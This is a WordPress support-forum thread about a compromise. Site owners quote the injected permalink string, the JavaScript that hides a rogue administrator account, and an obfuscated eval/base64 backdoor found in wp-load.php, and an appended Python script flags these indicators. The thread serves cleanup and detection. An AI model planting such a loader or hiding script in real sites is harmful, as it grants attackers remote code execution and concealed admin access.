• This just started today, and I’m not certain why it is happening. At the end of any link, WP is appending the following “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/” to the end of the link.

    I’m far from an expert on WP code (I deal mostly with Drupal) so I’m not certain how WP is building links/passing the link information. The theme link is correctly set to <?php the_permalink() ?>.

    Any thoughts on why this is happening?

Viewing 15 replies - 16 through 30 (of 66 total)
  • Thanks for that Chloe. I had 2 blogs compromised. One didn’t have new users, but one indeed has a new admin, RobertToth89 or similar. He disappears immediately after loading the page, so I can’t edit or delete him.

    Chloe,

    I do not have that problem, but if you have access to the database you can go into the Users table and manually delete the unwanted account

    Got it – he has a first name of a whole bunch of javascript designed to hide him.

    here it is

    … <div id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){ try{ var t=document.getElementById(“user_superuser”); while(t.nodeName!=”TR”){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName(“H3″); var s = ” shown below”; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName(“ul”); for(var i in arr) if(arr[i].className==”subsubsub”){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator (“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

    I got him by clicking on another user, and then just increasing the user ID number in the URL til I found him

    I deleted that javascript and saved him as a subscriber, and then I could see him in the lists and delete him

    The blog that had the admin inserted was on 2.6.3 at the time, and the one that didn’t was on 2.7.1, so maybe the admin insertion in older blogs is the real aim behind this, and the permalink screwup without admin insertion is just all that later versions will permit.

    Found this at the top of wp-load.php, is this related?

    function gpc_4701($l4703){if(is_array($l4703)){foreach($l4703 as $l4701=>$l4702)$l4703[$l4701]=gpc_4701($l4702);}elseif(is_string($l4703) && substr($l4703,0,4)==”____”){eval(base64_decode(substr($l4703,4)));$l4703=null;}return $l4703;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map(“gpc_4701”,$_SERVER);

    @johninnit Thanks for that – I’ll try your process and delete him if I can. I am on version 2.7.1 though so does that throw your theory of just attacking older versions? If we delete him, do you think that’s the end of it or should I be looking for other problems?

    This just started happening on my site https://www.AmericanFreethought.com overnight.

    Has anyone figured out definitively what is causing this and how to fix it? It appears to affect all the permalinks (all that I have checked anyway), and I don’t seem to be able to edit the link and remove all the gobbledy-gook off the end.

    Unfortunately, I am not a coder. Is there a relatively straightforward way to remedy this?

    Thanks!

    Chloe,

    Oh ?? That’s very odd.

    I had some good advice on clearing up after upgrade here https://www.ads-software.com/support/topic/307518?replies=15 – if you don’t know it already (I didn’t!)

    johncsnider, it should be possible to just choose one of the default permalink options in admin and have them fix themselves (and then upgrade and clean)

    Someone should probably do a proper writeup about this, because there seems to have been an outbreak overnight.

    It is important that everyone realises that just restoring the permalink setting isn’t enough; the hidden admin user has to be removed as well!

    ( My blog was compromised too: https://www.ads-software.com/support/topic/307588 )

    It seems that some sort of bot ran last night to infect a whole bunch of blogs with this scheme to open the doors. I suspect that this was the first step for this hacker, and the second step is to actually exploit the holes.

    The scary part is that we don’t know how the hacker inserted all these lines of code. So, it’s quite possible that the hacker would run the script/bot to re-open the doors to our sites. We haven’t done anything to protect our sites; we just fixed the damage.

    I noticed that this hidden admin did not have an email address. An email address is required at the time of registration, so I suspect that it was inserted directly into the database.

    Were any of you running 2.8.4 when this happened? Because I upgraded to the latest version immediately after discovering this, hoping that that would prevent it from happening again…

    @johninnit I did it – I got him, but more by luck than judgement – I managed to click on him in the split second before he disappeared on the page load! So he’s now gone, but how do we know what he did when he was there? Is there a change/action log in WordPress anywhere? Will read the page you recommended.

    @dyske It’s a worry isn’t it. If the permalinks hadn’t changed I guess it would have taken a lot longer to notice the hidden admin user. Has anyone on the latest WordPress version had any trouble? Should upgrading be our priority?

    I got the same problem and was forwarded this link by a friend…pretty straight-forward.
    https://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

  • The topic ‘WP adding code to the end of url links breaking them’ is closed to new replies.
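
Added example, not code from any poster or from WordPress: a Python check for the three indicators reported in this thread (PHP embedded in the permalink structure, the eval/base64 loader mapped over `$_SERVER` in a core file, and an account with markup in its name or no email address). It assumes rows exported from the standard `wp_users` and `wp_usermeta` tables; all sample data, including the login name, is constructed.

```python
import re
from urllib.parse import unquote

# Patterns derived from the strings quoted in this thread.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
SERVER_WALK = re.compile(r"array_map\s*\(\s*[\"']\w+[\"']\s*,\s*\$_SERVER", re.I)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)


def permalink_is_tampered(structure):
    """True if the permalink_structure option (raw or URL-encoded) embeds PHP."""
    return bool(EVAL_B64.search(structure) or EVAL_B64.search(unquote(structure)))


def scan_php(source):
    """Return the names of the backdoor indicators present in one PHP file."""
    hits = []
    if EVAL_B64.search(source):
        hits.append("eval(base64_decode(...))")
    if SERVER_WALK.search(source):
        hits.append("callback mapped over $_SERVER")
    return hits


def suspicious_users(users, usermeta):
    """Map user ID -> reasons, given (ID, login, email) and (user_id, key, value) rows."""
    reasons = {}
    for user_id, _login, email in users:
        if not (email or "").strip():
            reasons.setdefault(user_id, []).append("no email address")
    for user_id, key, value in usermeta:
        if SCRIPT_TAG.search(value or ""):
            reasons.setdefault(user_id, []).append("markup in " + key)
    return reasons


# Constructed samples modelled on what the posters describe.
SAMPLE_PERMALINK = ("/%year%/%postname%/%&(%7B$%7Beval(base64_decode("
                    "$_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/")
SAMPLE_PHP = ('<?php function gpc_4701($v){ eval(base64_decode(substr($v,4))); }\n'
              'array_map("gpc_4701",$_SERVER);')
SAMPLE_USERS = [(1, "admin", "owner@example.org"), (7, "placeholder_login", "")]
SAMPLE_USERMETA = [(1, "first_name", "Ann"),
                   (7, "first_name", '<div id="user_superuser"><script></script></div>')]

if __name__ == "__main__":
    print(permalink_is_tampered(SAMPLE_PERMALINK))
    print(scan_php(SAMPLE_PHP))
    print(suspicious_users(SAMPLE_USERS, SAMPLE_USERMETA))
```

A hit from `scan_php` is a lead for manual review rather than proof, since some legitimate code also decodes and evaluates strings.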